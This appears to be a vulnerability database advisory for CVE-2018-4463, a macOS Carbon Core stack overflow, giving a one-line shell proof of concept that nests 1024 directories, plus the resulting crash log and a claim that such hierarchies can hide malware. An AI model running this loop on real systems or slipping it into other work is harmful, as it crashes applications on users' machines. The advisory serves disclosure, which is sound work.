macOS 10.14.1 Carbon Core Memory corruption

2018.12.06
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

CVE: CVE-2018-4463 Old and funny bug (CVE-2018-4463) was patched by Apple in last macOS security update. Since 2015 Apple was exposing the users using Appleā€™s filesystem for stack overflow and infection by hidedd malware in DMG image. Insufficient patch for old vulnerability is the cause of problems Trivial and funny PoC: # for i in {1..1024}; do mkdir B && cd B; done And for macOS 10.13 you will get ... +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Crashed Thread: 0 Dispatch queue: com.apple.main-thread Exception Type: EXC_CRASH (SIGABRT) Exception Codes: 0x0000000000000000, 0x0000000000000000 Exception Note: EXC_CORPSE_NOTIFY Application Specific Information: [14239] stack overflow Thread 0 Crashed:: Dispatch queue: com.apple.main-thread 0 libsystem_kernel.dylib 0x00007fff6baa8b66 __pthread_kill + 10 1 libsystem_pthread.dylib 0x00007fff6bc73080 pthread_kill + 333 2 libsystem_c.dylib 0x00007fff6ba0424d __abort + 144 3 libsystem_c.dylib 0x00007fff6ba04af8 __stack_chk_fail + 205 4 com.apple.CoreServices.CarbonCore 0x00007fff44ce6a66 canonpath(char const*, char*, int*) + 971 5 com.apple.CoreServices.CarbonCore 0x00007fff44ca50c6 FSGetCanonicalPath + 143 6 com.apple.CoreServices.CarbonCore 0x00007fff44ce6f88 PathGetObjectInfo(char const*, unsigned int, short*, unsigned int*, unsigned int*, char*, unsigned int*, unsigned char*, unsigned int*) + 135 7 com.apple.CoreServices.CarbonCore 0x00007fff44cf2fed FSPathMakeRefInternal(unsigned char const*, unsigned int, FSRef*, unsigned char*) + 99 8 com.apple.CoreFoundation 0x00007fff43b36444 _CFGetFSRefFromURL + 276 9 com.apple.AppKit 0x00007fff412c2194 -[NSThemeDocumentButton _refreshDocumentIconAndDisplayNameForURL:] + 74 ... 30 com.apple.AppKit 0x00007fff4107aa72 NSApplicationMain + 804 31 libdyld.dylib 0x00007fff6b958015 start + 1 +++++++++++++++++++++++++++++++++++++++++++++++++++++++++ where stack smashing protection prevented the stack overflow but the terminal has crashed. Special crafted hierarchy making the malware possibility to hidde mailcous code in place where the most of antiviruses have no access. Credit: Maksymilian Arciemowicz References: https://cxsecurity.com/issue/WLB-2015100149 https://support.apple.com/en-us/HT209341 https://cxsecurity.com/

References:

https://support.apple.com/en-us/HT209341
https://cxsecurity.com/issue/WLB-2015100149


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top